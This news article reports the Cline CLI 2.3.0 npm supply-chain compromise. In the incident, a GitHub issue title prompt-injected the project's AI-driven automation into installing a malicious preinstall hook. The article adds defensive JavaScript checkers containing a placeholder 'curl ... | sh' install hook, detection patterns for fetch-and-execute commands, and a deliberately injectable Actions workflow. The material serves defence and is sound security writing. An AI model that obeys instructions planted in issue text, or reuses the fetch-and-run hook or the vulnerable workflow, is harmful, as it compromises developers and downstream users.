Cline CLI Supply Chain Attack Exposes Emerging AI Agent Risks in npm Ecosystem
Within a single workday, a routine npm install turned into a supply chain incident that is now reverberating across the open source and AI security communities, according to an analysis from Michael Bargury, CTO of Zenity.
The maintainers of Cline disclosed that version 2.3.0 of the Cline CLI was published to npm with unauthorized modifications. For roughly eight hours, developers who installed the package also pulled code associated with the OpenClaw ecosystem due to a malicious install script embedded in the release. The package was later removed, and an advisory was issued.
What initially appeared to be a standard npm compromise quickly evolved into something more revealing: a case study in how prompt injection can cascade through automated pipelines and result in a public release.
A Prompt Injection That Reached Production
The exploit chain traces back to a GitHub issue filed against the Cline repository. The issue title carried a crafted payload instructing the project's automation to install a specific helper package before running GitHub CLI commands, and the reference to that package pointed at a commit on a fork that added a malicious preinstall script to the project's package.json.
That preinstall hook fetched code from an external source. The referenced content was later deleted, but by then the automation had already acted on the instruction.
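The mechanism that did the damage is an ordinary npm lifecycle hook: a `preinstall`, `install` or `postinstall` entry in `scripts` runs automatically on every `npm install` of the package, with the installing user's privileges and network access, before anyone has read the code. The check below is an added example, not code from Cline or from the advisory. It scans a package.json for lifecycle scripts that fetch or evaluate remote content and reports hooks that a new release added over the previous one. The two manifests are constructed for illustration; the package name, versions and URL in them are placeholders.

```javascript
"use strict";

// Added example, not code from Cline or from the advisory: audit a package.json
// for lifecycle scripts that fetch or evaluate remote code at install time.

// Scripts npm runs automatically when the package is installed as a dependency:
// (pre|post)install always, `prepare` for git and local installs.
const AUTO_RUN_SCRIPTS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators of fetch-and-execute or obfuscated payloads.
const SUSPICIOUS_PATTERNS = [
  { id: "remote-fetch", re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i },
  { id: "url", re: /\bhttps?:\/\//i },
  { id: "pipe-to-shell", re: /\|\s*(sh|bash|zsh|pwsh|powershell)\b/ },
  { id: "inline-eval", re: /\bnode\s+(-e|--eval)\b/ },
  { id: "base64-decode", re: /base64\s+(-d|--decode)\b|['"]base64['"]/ },
];

// Every install-time hook is worth a look; one that matches an indicator is
// a red flag. Returns one finding per hook present in the manifest.
function auditLifecycleScripts(manifestText) {
  const scripts = JSON.parse(manifestText).scripts || {};
  const findings = [];
  for (const name of AUTO_RUN_SCRIPTS) {
    const command = scripts[name];
    if (typeof command !== "string") continue;
    const indicators = SUSPICIOUS_PATTERNS.filter((p) => p.re.test(command)).map((p) => p.id);
    findings.push({ script: name, command, indicators, severity: indicators.length ? "high" : "review" });
  }
  return findings;
}

// Lifecycle hooks that `next` has and `prev` did not (or changed): the signal
// that a release added install-time behaviour the previous version lacked.
function newLifecycleHooks(prevManifestText, nextManifestText) {
  const prev = JSON.parse(prevManifestText).scripts || {};
  const next = JSON.parse(nextManifestText).scripts || {};
  return AUTO_RUN_SCRIPTS.filter((name) => typeof next[name] === "string" && next[name] !== prev[name]);
}

// Constructed manifests for illustration; names, versions and URL are placeholders.
const CLEAN_MANIFEST = JSON.stringify({
  name: "example-cli",
  version: "2.2.0",
  scripts: { build: "tsc -p .", test: "node --test" },
});

const TAMPERED_MANIFEST = JSON.stringify({
  name: "example-cli",
  version: "2.3.0",
  scripts: {
    build: "tsc -p .",
    // The kind of hook the article describes: fetch a script and run it at install time.
    preinstall: "curl -fsSL https://example.invalid/setup.sh | sh",
  },
});

// Stand-alone run: compare the two releases and audit the newer one.
console.log("new hooks:", newLifecycleHooks(CLEAN_MANIFEST, TAMPERED_MANIFEST));
console.log(JSON.stringify(auditLifecycleScripts(TAMPERED_MANIFEST), null, 2));
```

`npm view <pkg>@<version> scripts --json` returns the scripts map of a published version without installing it, so the diff can be run before an upgrade lands in a lockfile. Pair it with `npm ci --ignore-scripts` in CI so a hook cannot execute until it has been reviewed. The patterns are heuristics: an attacker can move the fetch into a file the hook merely requires, so a clean scripts map is necessary, not sufficient.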
Security researcher Adnan Khan had privately reported a supply chain weakness in Cline weeks earlier. His proof of concept demonstrated how attackers could abuse prompt injection to influence automated GitHub Actions workflows and potentially exfiltrate repository authentication tokens. According to his disclosure timeline, he first contacted the project maintainers on January 1 and published details on February 7 after not receiving a response.
The malicious issue appeared on January 28, before the full technical blog post was released. That timing suggests the attacker identified and weaponized the publicly visible proof of concept before the broader community had time to absorb the implications.
Automation as an Attack Surface
Michael Bargury, CTO of Zenity, published a technical reconstruction of the incident that maps how the injected issue propagated into the build and publication workflow. His analysis highlights how AI-influenced automation pipelines become high-impact attack vectors when they interpret untrusted content as instructions.
The episode reinforces a growing reality in modern software development: CI pipelines, GitHub Actions, and AI-assisted tooling are not passive infrastructure. They are decision-making systems that execute code based on contextual signals. When those signals include untrusted user input, the boundary between a bug report and a command can disappear.
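The workflow-level form of that disappearing boundary is an Actions expression such as `${{ github.event.issue.title }}` spliced directly into a `run:` script. The runner substitutes the contributor's text before the shell parses the command, so a title can close the quotes and append commands, and whatever the step runs next, an agent CLI included, runs with the job's token. The linter below is an added example, not Cline's workflow and not Bargury's tooling. It walks a workflow file line by line, flags contributor-controlled event fields that land in a `run:` or `with:` sink rather than an `env:` binding, and reports whether the workflow declares an explicit `permissions` block. The two workflows are constructed for illustration and `agent-cli` is a hypothetical placeholder for whatever tool the step drives.

```javascript
"use strict";

// Added example, not Cline's workflow or tooling: line-oriented lint for a
// GitHub Actions workflow. Flags contributor-controlled event fields spliced
// into an executable sink and checks for an explicit permissions block.

// Event payload fields an outside contributor controls (issue and PR text,
// comments, branch names, commit messages). Not exhaustive.
const UNTRUSTED_CONTEXT = [
  /github\.event\.issue\.(title|body)/,
  /github\.event\.pull_request\.(title|body)/,
  /github\.event\.pull_request\.head\.(ref|label)/,
  /github\.event\.(comment|review|review_comment)\.body/,
  /github\.event\.(head_commit|commits\[\d*\])\.message/,
  /github\.head_ref/,
];

// A GitHub Actions expression: ${{ ... }}
const EXPR = /\$\{\{([^}]*)\}\}/g;

function lintWorkflow(yamlText) {
  const unsafe = [];              // untrusted values reaching a run/with sink
  let hasExplicitPermissions = false;
  let block = null;               // "run" | "env" | "with" | null
  let blockIndent = 0;

  yamlText.split("\n").forEach((line, idx) => {
    const trimmed = line.trim();
    const indent = line.length - line.trimStart().length;
    // A non-blank line at or left of the current key closes its block.
    if (block !== null && trimmed !== "" && indent <= blockIndent) block = null;

    const key = /^\s*(?:-\s+)?(run|env|with|permissions):/.exec(line);
    if (key) {
      if (key[1] === "permissions") hasExplicitPermissions = true;
      else { block = key[1]; blockIndent = line.indexOf(key[1] + ":"); }
    }

    for (const m of line.matchAll(EXPR)) {
      const expr = m[1].trim();
      if (!UNTRUSTED_CONTEXT.some((re) => re.test(expr))) continue;
      // env binding is the documented safe pattern: the value becomes a
      // variable and never passes through the shell parser as code.
      if (block === "env") continue;
      unsafe.push({ line: idx + 1, expression: expr, sink: block || "other" });
    }
  });

  return { unsafe, hasExplicitPermissions };
}

// Constructed workflow: issue title and body are spliced straight into the
// shell command that drives the agent, and no permissions are declared.
const VULNERABLE_WORKFLOW = [
  "name: triage",
  "on:",
  "  issues:",
  "    types: [opened]",
  "jobs:",
  "  triage:",
  "    runs-on: ubuntu-latest",
  "    steps:",
  "      - uses: actions/checkout@v4",
  "      - name: Ask the agent to triage the issue",
  "        run: |",
  '          agent-cli triage --title "${{ github.event.issue.title }}" \\',
  '            --body "${{ github.event.issue.body }}"',
  "        env:",
  "          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}",
].join("\n");

// Constructed hardened form: untrusted text is bound to environment variables,
// the token is scoped, and the job carries no publishing credential at all.
const HARDENED_WORKFLOW = [
  "name: triage",
  "on:",
  "  issues:",
  "    types: [opened]",
  "permissions:",
  "  contents: read",
  "  issues: write",
  "jobs:",
  "  triage:",
  "    runs-on: ubuntu-latest",
  "    steps:",
  "      - uses: actions/checkout@v4   # pin to a full commit SHA in practice",
  "      - name: Ask the agent to triage the issue",
  "        env:",
  "          ISSUE_TITLE: ${{ github.event.issue.title }}",
  "          ISSUE_BODY: ${{ github.event.issue.body }}",
  "          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}",
  "        run: |",
  "          # The agent receives the text as data; a title cannot add commands here.",
  '          agent-cli triage --title "$ISSUE_TITLE" --body "$ISSUE_BODY"',
].join("\n");

// Stand-alone run: report on both workflows.
for (const [label, wf] of [["vulnerable", VULNERABLE_WORKFLOW], ["hardened", HARDENED_WORKFLOW]]) {
  console.log(label, JSON.stringify(lintWorkflow(wf), null, 2));
}
```

The env binding closes the shell injection; it does nothing about prompt injection inside the model that reads the variable. That is why the hardened workflow also declares least-privilege `permissions` and holds no publish credential: a hijacked agent in this job can at most touch issues, not cut a release. The lint is line-based and will miss expressions inside flow-style or folded YAML, so treat it as a first pass, not a guarantee.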
Chris Hughes, VP of Security Strategy at Zenity, said the industry has underestimated this class of risk.
“We have been talking about AI supply chain security in theoretical terms for too long, and this week it became operational reality. When a single issue title can influence an automated build pipeline and affect a published release, the risk is no longer theoretical.
The industry needs to start recognizing AI agents as privileged actors that require governance.”
Unauthorized npm Publication and OpenClaw Link
According to the public advisory, the unauthorized publication affected Cline CLI version 2.3.0 and remained live for approximately eight hours. During that window, users who installed the package received a modified build containing a malicious install script tied to the OpenClaw ecosystem.
OpenClaw has been associated with research into autonomous AI agents capable of interacting with development environments. In this case, the name surfaced inside an installation hook, suggesting that the attacker’s objective may have included credential access or repository token exfiltration rather than immediate destructive behavior.
The language used in the advisory described the compromise as unauthorized and characterized the impact as limited in duration. But in supply chain security, duration matters less than trust boundaries. Every install during the window left a tarball in a local npm cache and a 2.3.0 entry in some lockfile, so even a short-lived publication seeds compromised environments across CI pipelines, developer machines, and downstream dependencies long after the listing is gone.
Raptor and Open Source Forensics
The incident also served as a test case for emerging open source forensic tooling. Analysts using Raptor’s /oss-forensics command were able to trace the malicious commit and identify the compromising user account in short order. The speed of that analysis underscores both the transparency of open source ecosystems and the importance of rapid investigation when automation pipelines are involved.
Open repositories create immutable audit trails, but only if someone is actively reviewing them. In this case, forensic tooling helped compress what could have been days of manual review into a focused investigation.
The Bigger Signal for AI and GitHub Security
This breach sits at the intersection of several 2026 realities: AI assisted coding, GitHub Actions automation, npm supply chain risk, and prompt injection vulnerabilities. Each element has been discussed independently. Together, they form a new threat model.
AI systems embedded in development workflows are increasingly treated as helpers. Yet when those systems can influence builds, publish artifacts, or access authentication tokens, they effectively operate with privileged authority.
The Cline incident demonstrates how an attacker can move from a public issue thread to a published npm package without breaching a server in the traditional sense. Instead of exploiting a memory corruption flaw or stolen password, the attacker exploited trust in automation.
For developers searching terms like Cline CLI unauthorized npm publication, OpenClaw npm compromise, GitHub Actions prompt injection attack, or AI supply chain security incident, this case will likely become a reference point.
The broader lesson is not that AI should be removed from development workflows. It is that AI agents and automation pipelines must be treated as privileged actors. That means treating issue and pull request text as data rather than instructions, isolating build steps, scoping publish tokens to the jobs that actually need them, and placing a human review gate before anything is published.
The open source ecosystem thrives on speed and automation. This week, it was reminded that speed without guardrails can ship more than code.